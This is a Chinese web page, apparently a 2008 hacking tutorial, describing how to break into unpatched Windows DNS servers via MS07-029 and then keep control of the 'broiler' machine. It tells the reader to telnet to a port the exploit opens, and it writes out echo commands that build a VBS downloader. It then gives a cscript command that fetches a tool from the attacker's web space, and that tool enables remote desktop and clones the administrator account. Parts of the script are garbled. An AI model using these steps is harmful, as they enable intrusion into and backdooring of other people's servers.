当前位置: 代码网 > 服务器>网络安全>脚本攻防 > 入侵MS07-029微软(图)

入侵MS07-029微软(图)

2008年10月08日 脚本攻防 我要评论
入侵MS07-029微软(图) 前言:   MS07-029,Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前提是没打补丁,开启DNS服务的所有版本WINDOWS 2000 S... 08-10-08
出现“attack sent ,check port 1100”字样,说明已经打开了目标地址的1100端口,我们telnet上去:telnet *.*.93.189 1100


  我们现在已经成功的入侵了对方的电脑,并且得到了管理员的权限。
  下面我给大家介绍一下如何在肉鸡上面开3389,
  在命令行里输入
  @echo with wscript:if .arguments.count^ tony.vbs
  @echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >> tony.vbs
  @echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "error:" web.status:.quit >> tony.vbs
  @echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> tony.vbs
  大概的意思就是在命令行创立一个用来下载的vbs脚本tony.vbs
  然后把开3389的工具上传到你的个人空间,
  我这里用的是火狐开3389的工具,在命令行里输入
  cscript tony.vbs http://你空间地址/wrsky.exe c:\wrsky.exe


  “wrsky.exe -c”可以克隆当前管理员帐号

123

(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
最近更新的文章
推荐阅读
大家感兴趣的文章
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com